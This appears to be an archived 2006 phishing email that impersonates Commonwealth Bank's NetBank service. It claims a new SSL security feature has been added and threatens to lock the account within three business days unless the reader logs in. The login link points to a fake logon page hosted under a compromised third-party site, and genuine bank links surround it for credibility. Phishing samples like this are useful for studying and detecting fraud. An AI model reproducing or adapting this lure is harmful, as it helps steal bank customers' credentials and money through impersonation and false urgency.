update your account

services at commonwealthbank.com services at commonwealthbank.com
Wed Nov 22 23:22:53 PST 2006

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                     clouds   Attention! Security Update
                        Dear Commonwealth Bank user:
    This is to inform you that a new security feature has been added to
      our SSL security server database to give our NetBank customers a
     better, fast and more secure online banking service. Here are just
       some of the ways that NetBank protects your funds and personal
                               information. .
     * Personalized Identification Questions - extra for important
     * New Email Alerts and Bank Messages
     * Additional Logins

        In order to confirm your account and to preserve the account
       stability, you are required to login to your account using the
                           following link below:

   Attention! Be notified that your account would be temporarily locked
   if you do not activate your account through our new security SSL
   server within the next three business days.

   [3]Terms & Conditions | [4]Security
                             CBA Logo


   1. https://www3.netbank.commbank.com.au/netbank/bankmain#skiptocontent
   2. http://www.jens-bremeier.de/administrator/components/com_modules/.,/access/commonwealth%20bank/update/netbank.com.au/logon.html
   3. https://www.secure.commbank.com.au/login/conditions_splash.asp
   4. http://www.commbank.com.au/netbank/security.asp

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